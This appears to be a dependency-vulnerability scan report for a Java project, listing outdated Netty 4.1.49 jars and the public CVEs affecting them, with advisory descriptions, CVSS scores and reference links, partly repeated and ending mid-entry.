- [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final
- [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290
- [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290
- [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0
- [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295
- [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E
- CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj
- CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/
- DEBIAN - DSA-4885
- MISC - https://github.com/Netflix/zuul/pull/980
- MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4
- MISC - https://www.oracle.com/security-alerts/cpuapr2022.html
- OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
- OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295
- OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj
- OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h
Vulnerable Software & Versions:
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295, which missed fixing this one case. This was fixed as part of 4.1.61.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21290
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporary storing of uploads on the disk is enabled. On Unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on Unix-like systems creates a random file, but, by default, will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify one's own "java.io.tmpdir" when starting the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporary storing of uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows, as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use `DefaultHttpDataFactory.setBaseDir(...)` to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
netty-common-4.1.49.Final.jar (shaded: org.jctools:jctools-core:3.0.0)
Description: Java Concurrency Tools Core Library
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/io/netty/netty-common/4.1.49.Final/netty-common-4.1.49.Final.jar/META-INF/maven/org.jctools/jctools-core/pom.xml
MD5: 095b6221b2a65322d08458d37fa574d2
SHA1: ad6ba95498dc140e8d8c7b4c1348f73be69205c9
SHA256: 87c10bb67da5c9894623829c24d8290edcd429979ebe568d97009ee3eca9d6c1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | jctools-core | Low
Vendor | pom | groupid | org.jctools | Highest
Vendor | pom | name | Java Concurrency Tools Core Library | High
Vendor | pom | url | JCTools | Highest
Product | pom | artifactid | jctools-core | Highest
Product | pom | groupid | org.jctools | Highest
Product | pom | name | Java Concurrency Tools Core Library | High
Product | pom | url | JCTools | High
Version | pom | version | 3.0.0 | Highest
netty-transport-4.1.49.Final.jar
Description: Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients.
License: http://www.apache.org/licenses/LICENSE-2.0
File Path: /var/simplicite/.m2/repository/io/netty/netty-transport/4.1.49.Final/netty-transport-4.1.49.Final.jar
MD5: f94308ae6129d24af529effbf3fc4cab
SHA1: 415ea7f326635743aec952fe2349ca45959e94a7
SHA256: 94e95c5d2b3372806e25c574bb2f51e92eb2e84ff9ae0738789f0aa0a34fb036
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | netty-transport | High
Vendor | jar | package name | io | Highest
Vendor | jar | package name | netty | Highest
Vendor | Manifest | automatic-module-name | io.netty.transport | Medium
Vendor | Manifest | bundle-docurl | https://netty.io/ | Low
Vendor | Manifest | bundle-symbolicname | io.netty.transport | Medium
Vendor | Manifest | implementation-url | https://netty.io/netty-transport/ | Low
Vendor | Manifest | Implementation-Vendor | The Netty Project | High
Vendor | Manifest | Implementation-Vendor-Id | io.netty | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Vendor | pom | artifactid | netty-transport | Highest
Vendor | pom | artifactid | netty-transport | Low
Vendor | pom | groupid | io.netty | Highest
Vendor | pom | name | Netty/Transport | High
Vendor | pom | parent-artifactid | netty-parent | Low
Product | file | name | netty-transport | High
Product | jar | package name | io | Highest
Product | jar | package name | netty | Highest
Product | Manifest | automatic-module-name | io.netty.transport | Medium
Product | Manifest | bundle-docurl | https://netty.io/ | Low
Product | Manifest | Bundle-Name | Netty/Transport | Medium
Product | Manifest | bundle-symbolicname | io.netty.transport | Medium
Product | Manifest | Implementation-Title | Netty/Transport | High
Product | Manifest | implementation-url | https://netty.io/netty-transport/ | Low
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Product | pom | artifactid | netty-transport | Highest
Product | pom | groupid | io.netty | Highest
Product | pom | name | Netty/Transport | High
Product | pom | parent-artifactid | netty-parent | Medium
Version | Manifest | Bundle-Version | 4.1.49.Final | High
Version | Manifest | Implementation-Version | 4.1.49.Final | High
Version | pom | version | 4.1.49.Final | Highest
Related Dependencies (all located under /var/simplicite/.m2/repository/io/netty/):
- netty-buffer-4.1.49.Final.jar (pkg:maven/io.netty/netty-buffer@4.1.49.Final)
- netty-codec-http-4.1.49.Final.jar (pkg:maven/io.netty/netty-codec-http@4.1.49.Final)
- netty-codec-http2-4.1.49.Final.jar (pkg:maven/io.netty/netty-codec-http2@4.1.49.Final)
- netty-codec-redis-4.1.49.Final.jar (pkg:maven/io.netty/netty-codec-redis@4.1.49.Final)
- netty-common-4.1.49.Final.jar (pkg:maven/io.netty/netty-common@4.1.49.Final)
- netty-handler-4.1.49.Final.jar (pkg:maven/io.netty/netty-handler@4.1.49.Final)
- netty-resolver-4.1.49.Final.jar (pkg:maven/io.netty/netty-resolver@4.1.49.Final)
- netty-transport-native-epoll-4.1.49.Final.jar (pkg:maven/io.netty/netty-transport-native-epoll@4.1.49.Final)
- netty-transport-native-kqueue-4.1.49.Final.jar (pkg:maven/io.netty/netty-transport-native-kqueue@4.1.49.Final)
- netty-transport-native-unix-common-4.1.49.Final.jar (pkg:maven/io.netty/netty-transport-native-unix-common@4.1.49.Final)
CVE-2021-37136
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder function doesn't restrict the chunk length, which may lead to excessive memory usage. Besides this, it also may buffer reserved skippable chunks until the whole chunk was received, which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-41881
The Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder.
CWE-674 Uncontrolled Recursion
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-43797
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast, as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forwards these to another remote system when used as a proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the server name indicated by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet, but there are no checks done here and, the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1, this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is an HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, users can do the validation themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References: see the CVE-2021-21295 entry above.
[zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] 
ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E - 
https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/ DEBIAN - DSA-4885 MISC - https://github.com/Netflix/zuul/pull/980 MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4 MISC - https://www.oracle.com/security-alerts/cpuapr2022.html OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj OSSIndex - 
https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h Vulnerable Software & Versions: (show all )
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295, which failed to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21290
